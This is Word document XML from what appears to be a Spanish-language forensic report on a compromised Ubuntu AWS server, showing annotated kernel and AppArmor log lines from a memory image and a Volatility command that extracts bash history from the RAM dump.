    <w:p w14:paraId="60FF4AB1" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE1453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 Reinicio del Servidor.  1 de septiembre de 2018 a las 09:53:22 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29290B73" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A904A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[343815640354.343] systemd: 36 output lines suppressed due to ratelimiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D247E9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[343819811212.343] systemd[1]: systemd 237 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A483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[343819860527.343] systemd[1]: Detected virtualization xen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751577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[343819868348.343] systemd[1]: Detected architecture x86-64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66968418" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3756683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 Reinicio del servicio Journal 1 de septiembre de 2018 a las 09:59:10 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E88AC8" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C20BFB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[344163440924.344] systemd[1]: Stopping Journal Service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68D8D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[344166748005.344] systemd-journald[393]: Received SIGTERM from PID 1 (systemd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24541490"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[344191632037.344] systemd[1]: Stopped Journal Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5AB6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[344193359863.344] systemd[1]: Starting Journal Service...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD9F7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[344209913346.344] systemd[1]: Started Journal Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCBFE56" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E8FC1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 Inicio de denegación de servicio SQL 3 de mayo de 2019 a las 20:10:29 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CBA54" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5725018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[21462442803498.21462] kauditd_printk_skb: 13 callbacks suppressed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8902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[21462442805151.21462] audit: type=1400 audit(1545415341.020:74): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/usr/sbin/mysqld" pid=773 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F088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[21463206148453.21463] audit: type=1400 audit(1545415341.784:75): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=867 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476ED2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[21463221380545.21463] audit: type=1400 audit(1545415341.800:76): apparmor="DENIED" operation="capable" profile="/usr/sbin/mysqld" pid=867 comm="mysqld" capability=2  capname="dac_read_search"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617496E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[21463255863431.21463] audit: type=1400 audit(1545415341.836:77): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=879 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF1747" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BCF16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 Denegación de servicio SQL 7 de mayo de 2019 a las 05:53:01 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728705B7" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F327E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[21756594961731.21756] audit: type=1400 audit(1545415635.164:78): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=2652 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DB9E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[21833553902942.21833] audit: type=1400 audit(1545415712.122:79): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3061 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0D01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[21875757992232.21875] audit: type=1400 audit(1545415754.321:80): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3542 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BFD03" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7146434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 Denegación de servicio SQL 10 de mayo de 2019 a las 06:39:15.104327 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F6630" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B501B3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[22018568104327.22018] audit: type=1400 audit(1545415897.129:81): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3758 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31471A"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[22018607698200.22018] audit: type=1400 audit(1545415897.169:82): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=3763 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8191C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[22074531220184.22074] audit: type=1400 audit(1545415953.092:83): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4539 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C25742" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579A626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 12 de mayo de 2019 a las 12:02:32.671468 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE0B0B" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBA87F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[22210765671468.22210] audit: type=1400 audit(1545416089.324:84): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4632 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FF59A3"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[22210807976537.22210] audit: type=1400 audit(1545416089.368:85): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4640 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E978F" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A91E84" w14:textId="0909F9FF"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 xml:space="preserve"># 13 de mayo de 2019 a las 05:27:58 UTC, posible brecha y entrada no deseada en el sistema a </w:t>
      </w:r>
      <w:r w:rsidR="009E264A" w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>través</w:t>
      </w:r>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> de un ataque SQL. Se reemplaza un perfil en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04986D" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14586BC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[22273491157183.22273] audit: type=1400 audit(1545416152.047:86): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/sbin/mysqld" pid=4768 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2BBDD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[22273549967523.22273] audit: type=1400 audit(1545416152.107:87): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4786 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F717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[22273604163691.22273] audit: type=1400 audit(1545416152.159:88): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4801 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D50EC8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[22277537601294.22277] audit: type=1400 audit(1545416156.095:89): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4860 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F9CAF" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447AE00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 13 de mayo de 2019 a las 07:20:17 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F07F13" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D47C74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[22280230105408.22280] audit: type=1400 audit(1545416158.786:90): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=4912 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4E4A8"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[22282295921818.22282] audit: type=1400 audit(1545416160.850:91): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/usr/sbin/mysqld" pid=4947 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4D03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lastRenderedPageBreak/>
        <w:t>[22282854213630.22282] audit: type=1400 audit(1545416161.410:92): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5019 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5410B"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[22282898519612.22282] audit: type=1400 audit(1545416161.454:93): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5027 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD4C7E" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2C3D3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 14 de mayo de 2019 a las 21:55:10 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7536213A" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A5A6A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[22419123420018.22419] audit: type=1400 audit(1545416297.675:94): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5121 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=0 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6525E"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[22419167903891.22419] audit: type=1400 audit(1545416297.719:95): apparmor="DENIED" operation="open" profile="/usr/sbin/mysqld" name="/sys/devices/system/node/" pid=5125 comm="mysqld" requested_mask="r" denied_mask="r" fsuid=111 ouid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2BED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[25524580731645.25524] audit: type=1400 audit(1545419403.049:96): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine" pid=6200 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B20C82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[25524581172130.25524] audit: type=1400 audit(1545419403.049:97): apparmor="STATUS" operation="profile_load" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=6200 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC4069"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[25524661228460.25524] audit: type=1400 audit(1545419403.129:98): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.core.hook.configure" pid=6203 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FE2DF"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[25524667927860.25524] audit: type=1400 audit(1545419403.137:99): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="snap-update-ns.core" pid=6205 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F5FF9" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68B1C0ED"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 19 de junio de 2019 a las 20:51:55.627714 UTC. Posible parcheo de la vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06432C67" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A0B18E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[25525728627714.25525] audit: type=1400 audit(1545419404.197:100): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.amazon-ssm-agent" pid=6264 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C7133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[25525731681561.25525] audit: type=1400 audit(1545419404.201:101): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.amazon-ssm-agent.amazon-ssm-agent" pid=6265 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E38C86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[25525734393872.25525] audit: type=1400 audit(1545419404.201:102): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.amazon-ssm-agent.ssm-cli" pid=6266 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DADEC"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[25525776327926.25525] audit: type=1400 audit(1545419404.245:103): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine" pid=6271 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B63D01"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[25525776541774.25525] audit: type=1400 audit(1545419404.245:104): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="/snap/core/6130/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=6271 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F3C62"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[25525795866859.25525] audit: type=1400 audit(1545419404.265:105): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.core" pid=6273 comm="apparmor_parser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC6075"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[66030429896299.66030] new mount options do not match the existing superblock, will be ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9D2EB6"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[1108227154620838.1108227] lime: version magic '4.15.0-42-generic SMP mod_unload ' should be '4.15.0-1021-aws SMP mod_unload '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515DD87" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[1109556640120032.1109556] lime: loading out-of-tree module taints kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734344DF" w14:textId="02E03C9E" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[1109556640155159.1109556] lime: module verification failed: signature and/or required key missing - tainting kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67334A96" w14:textId="14649F63" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B02164" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="74FA9F93" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="5A5E6DA3" w14:textId="7D4CAC00" w:rsidR="006A2A95" w:rsidRPr="006A2A95" w:rsidRDefault="004C5DDC" w:rsidP="004C5DDC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Ref155656695"/>
      <w:bookmarkStart w:id="192" w:name="_Toc155782538"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00457BEF">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00182D42">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006A2A95">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006A2A95" w:rsidRPr="006A2A95">
        <w:t>omando linux_</w:t>
      </w:r>
      <w:r w:rsidR="006A2A95">
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidR="006A2A95" w:rsidRPr="006A2A95">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w14:paraId="41D35022" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="3125A1E9" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841E317" w14:textId="6BC3197F" w:rsidR="006A2A95" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2A95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FFACAE" w14:textId="005782CF" w:rsidR="006A2A95" w:rsidRPr="00C9562B" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
